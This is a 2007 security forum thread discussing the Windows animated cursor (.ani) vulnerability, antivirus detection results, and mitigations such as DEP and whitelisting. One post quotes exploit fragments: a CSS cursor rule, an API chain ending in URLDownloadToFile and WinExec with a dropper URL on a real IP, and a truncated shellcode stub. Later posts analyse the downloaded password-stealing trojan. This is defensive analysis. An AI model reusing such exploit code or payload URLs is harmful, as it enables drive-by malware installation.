Vulnerability in Windows Animated Cursor Handling

Discussion in 'other security issues & news' started by ronjor, Mar 29, 2007.

Thread Status:
Not open for further replies.
  1. ThunderZ

    ThunderZ Registered Member

    Joined:
    May 1, 2006
    Posts:
    2,459
    Location:
    North central Ohio, U.S.A.
    Checked it out running 2k & IE6, NOD32 stopped it dead in it`s tracks.
     
  2. Firecat

    Firecat Registered Member

    Joined:
    Jan 2, 2005
    Posts:
    8,206
    Location:
    The land of no identity :D
    Microsoft might have known about these vulnerabilities from back in December, but I was even more surprised to find one corrupt sample which was from 2006 (according to my source, anyway) and was actually using the ANI exploit (Or at least that is what Ewido, AntiVir, BitDefender, QuickHeal and ClamAV say). Though my particular sample was corrupt, it is still detected by certain scanners as being infected, and this creates a cause for concern as it would seem that malware using this exploit may well have been around for a while now. :eek:

    As for detection of the ANI exploit, IMO the AVs with the best detection for such threats (including zero day protection) are BitDefender, NOD32 and Norman. Kaspersky is adding signatures for each variant instead of using generics, and hence ranks behind BD, NOD and Norman. I have two files using this exploit with me, I am checking them now to see who is detecting them.

    EDIT: it seems most good AVs are adding this malware now.
     
    Last edited: Apr 2, 2007
  3. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    3,112
    Location:
    Slovakia
  4. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Mcafee viruscan enterprise 8.5.0i
    DATs version 4997.0000
    sorry for the large image. resize if necessary.
     

    Attached Files:

    Last edited by a moderator: Apr 2, 2007
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    Has anyone analyzed this exploit?

    It's just another means to attempt to download a trojan .

    So, how do you prevent downloading of unauthorized executables?

    1) One site notes that using WinXP Pro with DEP (Data Execution Prevention) enabled, blocks the exploit.

    2) Anyone using SRP (Software Restriction Policies) would block.

    3) Any other program with execution prevention would block.

    The above are White List solutions -preferable for Zero-day prevention, since Black List solutions (AV, etc) aren't effective until the infected file is entered into the data base.

    sans.org noted a couple of days ago,

    From an article on White List solutions:

    Analysis

    This exploit is similar to the .ani file exploit from two years ago. See Microsoft Security Bulletin MS05-002

    The code embedded in a web page cached a .ani file:


    Code:
    style
    
    * {CURSOR: url("./exp_2/1.ani");}
     
    /style
    
    .........
    
    GetProcAddress-LoadLibrary-GetSystemDirectory-
    urlmon.dll-URLDownloadToFile-WinExec- 
    HTTP: / / 195.225.177.33/vx/win32.exe
    
    win32.exe was the dropper - easily blocked by any of the above White List solutions before the patch was released.

    From some sites posted elsewhere:

    ZERT's blog points out that the MS patch for the above exploit did not include another vulnerability present in the code:

    I haven't seen a file in the wild, but a POC shows:

    Code:
    /* ANI Header */ 
    unsigned char uszAniHeader[] =
    
    ......
    
    /* Shellcode - metasploit exec calc.exe ^^ */ 
    unsigned char uszShellcode[] = 
    "\xeb\x03\x59\xeb\x05\xe8\xf8\
    
    A malware author would substitute any of these for calc.exe

    Conclusion

    A valid threat, yes, but should not invoke "emergency mode" for those with proper protection.


    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
     
  6. Mele20

    Mele20 Former Poster

    Joined:
    Apr 29, 2002
    Posts:
    2,495
    Location:
    Hilo, Hawaii
    Have you tried downloading the POC from http://seclists.org/fulldisclosure/2007/Mar/0569.html using IE? Download the file and if you try this without an AV that is protecting you will be in for a nice surprise even if you have hardware DEP set to Opt Out. Be sure to NOT download the file to the desktop ...preferably to some isolated new folder or temp folder. Then try using Explorer and go to the download location. Explorer will crash and if downloaded to the desktop, Explorer will enter a crash/restart loop. You'll need to use a command window to delete the file. Or now with AV protecting you can turn on your AV but when I did this test, Avira was not yet protecting. Much of what you quoted is old, outdated, inaccurate information. Probably your best bet for current, accurate information is the GRC Security NG.
     
  7. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
  8. Mele20

    Mele20 Former Poster

    Joined:
    Apr 29, 2002
    Posts:
    2,495
    Location:
    Hilo, Hawaii
    You have Opt IN or Opt OUT for hardware DEP status?

    So, you ran the test and what? Avira popped up, I assume.

    It is the seclists.org one that is nasty if you download it. Change the link to "test.ani" instead of test.html.
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    Hi Mele,

    I did - I don't have an AV, nor DEP here on Win2k. nothing happened except the BOO! alert using both IE6 and Opera. I let the test.ani file cache, and then I downloaded it directly, and nothing happens.

    While PoCs are useful, only the real thing lets you know what is really going on. Unfortunately, every site I've seen referenced with the exploit is either down, or has been sanitized. A friend is also searching, but she has found nothing that works.

    I'm not sure what you mean. I've seen the GRC group (and your posts there). Unfortunately, there isn't really much information about how the exploit works - just running around trying to figure out how to delete the test.ani file.

    Evidently this PoC needs WinXP SP2 to work, and my Laptop with XP doesn't have Deep Freeze installed, so I don't test on that machine.

    My Desktop system with Win2K does have Deep Freeze so I just reboot to clear all cached and downloaded files during that session.

    There is a link at GRC to a pdf file which is another confirmation of the Chinese site analysis that I referenced in my previous post:

    Analysis of ANI "anih" Header Stack Overflow Vulnerability
    http://www.mnin.org/write/ani-notes.pdf

    My point is that ultimately, the aim of the *.ani file (or other extensions that it might use) is to download an executable, and this is what security-minded people should be concerned about. If it messes up other things on your computer, a restore, re-image, rollback, or reboot-to-restore will take care of the mess.

    The previous *.ani exploit in 2005 I referenced, also downloaded an executable. Below is a screen shot showing it being blocked. Notice the *.ani file in the status bar, being cached, immediately attempting to download the executable (code listed in previous post). The current exploit will attempt something similar, as noted in my two references, one here, and one in previous post.


    best regards,

    -rich
     

    Attached Files:

    • ani.gif
      ani.gif
      File size:
      28.9 KB
      Views:
      422
  10. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    OK, my friend found one. It's the mm.jpg file mentioned in the pdf file - I was getting ready to look for it but she beat me to it.

    Notice the last line in the code (screenshot below): calling out to download an executable.

    This is my point: no matter the obfuscation, sophistication of the exploit code, the money is made when a system permits a trojan/dropper to download.

    The file doesn't run here - it may require XP.

    I will download the executable later and scan it at VirusTotal to see what shows.


    regards,

    -rich
     

    Attached Files:

    • jpg.gif
      jpg.gif
      File size:
      14.2 KB
      Views:
      411
  11. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,924
    Location:
    SW. Oklahoma
    Went to the site to test IE for the Vulnerability but Mcafee Internet Security nabbed it first
     

    Attached Files:

  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    I downloaded the xx.exe file and most AV identified it as a PWS (password stealing) trojan.

    Note that the file embedded on the web site is a *.jpg file [mm.jpe] - identified by most AV by now as the ani.exploit. But the extension doesn't matter, since the code is an RIFF file. See:

    http://www.daubnet.com/formats/ANI.html

    Executing xx.exe installs bdscheca001.dll. This is a component of spyware applications:

    -----------------------------------------
    http://www.superantispyware.com/definition/bdscheca001/
    Summary of BDSCHECA001.DLL
    Spyware.PWS/Check Variant.ShellExecuteHook

    Description of BDSCHECA001.DLL
    File component of a password/information stealing trojan.
    Observed file name may vary
    -----------------------------------------

    It's evidently a popular file with malware writers and was observed two months ago in the javascript code injection exploits:

    "more code injection sites 8.js"
    http://isc.sans.org/diary.html?storyid=2178

    While the PoC demonstrates how Windows Explorer treats these types of files, the looping and all the other stuff it does is misleading IMO because the real exploit's purpose is to download the trojan. That's what you should be concerned about stopping - not detecting the .ani file, which will remain undetected on Zero-day.

    Think about it: serious malware writers don't want to call attention that something is amiss. The real exploit will install a trojan surrpetitiously, also without being detected at Zero-day, unless blocked by White Listing.

    So, if you understand how the exploit works, you don't have to go into "emergency mode" as the writer stated in the previous article I quoted.

    The problem is -- and I've mentioned this before -- you really have to dig to get a detailed analysis of these exploits (I've found just the two I referenced). Most articles just alert to a vulnerability, and everyone panics that doomsday is upon us. It makes for good sensationalist press, but it's not the whole story, and security-minded people shouldn't take these things at face value.


    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
     
  13. coldplay

    coldplay Registered Member

    Joined:
    Nov 12, 2006
    Posts:
    191
    update for ANI from MS yet?

    One of my computers got an autoupdate on Mon. afternoon(EST). It was about 5mb. And my other computer didn't get any updates from MS.
    I am kinda wondering what that update was about.

    BTW, eeye has a patch for .ani. read the article and scroll down for the patch:

    http://research.eeye.com/html/alerts/zeroday/20070328.html
     
  14. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    102,268
    Location:
    Texas
  15. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
    Hi Rmus, what is this software which is giving the alert on ur system( post#34)
     
  16. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
    I tried both with DEP enabled partialy and fully.
    Antivir oped up each time.

    I downloaded test.ani( 1KB file) from seclists.org and Antivir popped up. Disabled guard and then put it in a test folder. With DEP enabled, nothing happens. Will try after disabling DEP.
    Surprizingly I am not ablr to download thgis file by IE 6 , I get two zero KB files, test.ani and test.ani.temp.
     
  17. eyes-open

    eyes-open Registered Member

    Joined:
    May 13, 2005
    Posts:
    721
  18. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    102,268
    Location:
    Texas
  19. ASpace

    ASpace Guest

    According to this vidoe/demo all browsers are vulnerable.However, it seems that IE7 with Protected mode is more secure than Firefox because with IE7 with Protected mode we cannot overwrite important system files , which is possible with Firefox .
    It seems here IE7>Firefox .Wow :D
     
  20. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    Anti-Executable ;)
     
  21. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    102,268
    Location:
    Texas
    In any event, Microsoft has issued a patch for this exploit as noted in the security bulletin above.
     
  22. ThunderZ

    ThunderZ Registered Member

    Joined:
    May 1, 2006
    Posts:
    2,459
    Location:
    North central Ohio, U.S.A.

    I question that. o_O Visited the page with IE6. Was told I was vulnerable and Nod blocked it. Revisited it with FF 2.0.0.3 and was told I was not vulnerable and received no warning from Nod. :rolleyes:
     
  23. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
  24. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    This is the WHOIS info for newasp.com.cn:
    Apparently it is addressed to a person named Mr Chen..and some strange chinese franchise. Beijing technology company/ network information center.

    WHOIS results for newasp.com.cn

    Generated by www.DNSstuff.com

    status = "Getting WHOIS results...";Found WHOIS server for .cn: whois.cnnic.net.cn. Looking up.

    Using 6 day old cached answer (or, you can get fresh results).
    Hiding E-mail address (you can get results with the E-mail address).

    Domain Name: newasp.com.cn
    ROID: 20060703s10011s65965947-cn
    Domain Status: ok
    Registrant Organization: 浙江乐清翁洋镇塘下村迎门路
    Registrant Name: 陈银斌
    Administrative Email: *****@hichina.com
    Sponsoring Registrar: 北京万网志成科技有限公司
    Name Server:dns9.hichina.com
    Name Server:dns10.hichina.com
    Registration Date: 2006-07-03 21:37
    Expiration Date: 2007-07-03 21:37

    Page source in FF for newasp.com.cn/xx/exe:
    <html><head><title>Error</title></head><body>ϵͳÕÒ²»µ½Ö¸¶¨µÄÎļþ¡£
    </body></html>

    IP Information - 195.255.177.33
    Generated by www.DNSstuff.com

    IP address: 195.255.177.33
    Reverse DNS: ws33.trailcon.fi.
    Reverse DNS authenticity: [Verified]
    ASN: 719
    ASN Name: ELISA-AS (Elisa Oyj)
    IP range connectivity: 4
    Registrar (per ASN): RIPE
    Country (per IP registrar): FI [Finland]
    Country Currency: EUR [euros]
    Country IP Range: 195.255.0.0 to 195.255.255.255
    Country fraud profile: Normal
    City (per outside source): Unknown
    Country (per outside source): FI [Finland]
    Private (internal) IP? No
    IP address registrar: whois.ripe.net
    Known Proxy? No
    Link for WHOIS: 195.255.177.33
     
    Last edited: Apr 5, 2007
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.